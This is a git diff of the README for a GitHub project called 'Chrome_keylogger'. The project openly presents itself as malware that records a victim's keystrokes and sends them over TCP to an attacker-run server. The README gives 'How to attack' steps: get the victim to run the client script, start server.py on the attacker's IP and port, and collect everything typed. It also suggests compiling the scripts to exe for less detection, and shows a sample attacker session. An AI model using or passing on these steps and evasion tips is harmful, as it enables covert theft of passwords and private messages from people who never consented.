raven0xf/Chrome_keylogger/README.md

 # Chrome_keylogger
-A keylogger that starts logging when chrome is running.
-This malware will send the keystrokes from a TCP client back to the malicious TCP server
+A keylogger that shares keystrokes over a local TCP connection.

 # How to attack:
 First of all, you can edit the code a bit and compile all the scripts into exe for less detection.

 Follow these steps:
-  1- The victim must run program.py, when the file is ran, the keylogger and the TCP Client will start too. \n 2- The attacker must run server.py then bind his/her IP and port. \n 3- You will start receiving everything the victim types. \n
+  1- The victim must run the client's script, when the file is ran, the keylogger and the TCP Client will start too.
+  2- The attacker must run the server's script then bind the server's IP and port.
+  3- The attacker will start receiving keystrokes from the victim's computer.

 # Deeper demonstration:
-Attacker:\n
+Attacker:

     attacker@kali:~$ python3 server.py

-    Output:
-    IP: type_your_ip_here
+    IP: 192.168.x.x
     Port: 8080
     Client (client_ip) connected.